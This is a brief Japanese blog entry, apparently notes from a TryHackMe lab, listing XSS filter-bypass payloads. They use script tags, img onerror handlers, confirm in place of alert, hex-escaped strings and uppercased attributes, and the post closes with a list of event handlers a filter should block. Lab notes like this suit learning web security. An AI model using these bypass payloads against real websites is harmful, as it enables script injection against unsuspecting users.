TryHackMe頑張る~xssのフィルタバイパス
今回はTryHackMeのお話
今回、XSSについて学んでいました。
XSSを実施するうえでの、フィルタのバイパス方法について
Helloの文字をポップアップで出すことがお題
①基本形
<script>alert("Hello")</script>
②scriptという文字列がフィルタされる場合
imgタグを利用
<img src=x onerror=alert("Hello")>
③alertという文字列がフィルタされる場合
confirm, promptを利用
<img src=x onerror=confirm("Hello")>
④その他
文字列のUnicode変換
Hello→\x48\x65\x6c\x6c\x6f
文字列の大文字化
<img src=x ONERROR=confirm("\x48\x65\x6c\x6c\x6f")>
フィルタされるべき値
onerror
onsubmit
onload
onmouseover
onfocus
onmouseout
onkeypress
onchange
面白い!
以上。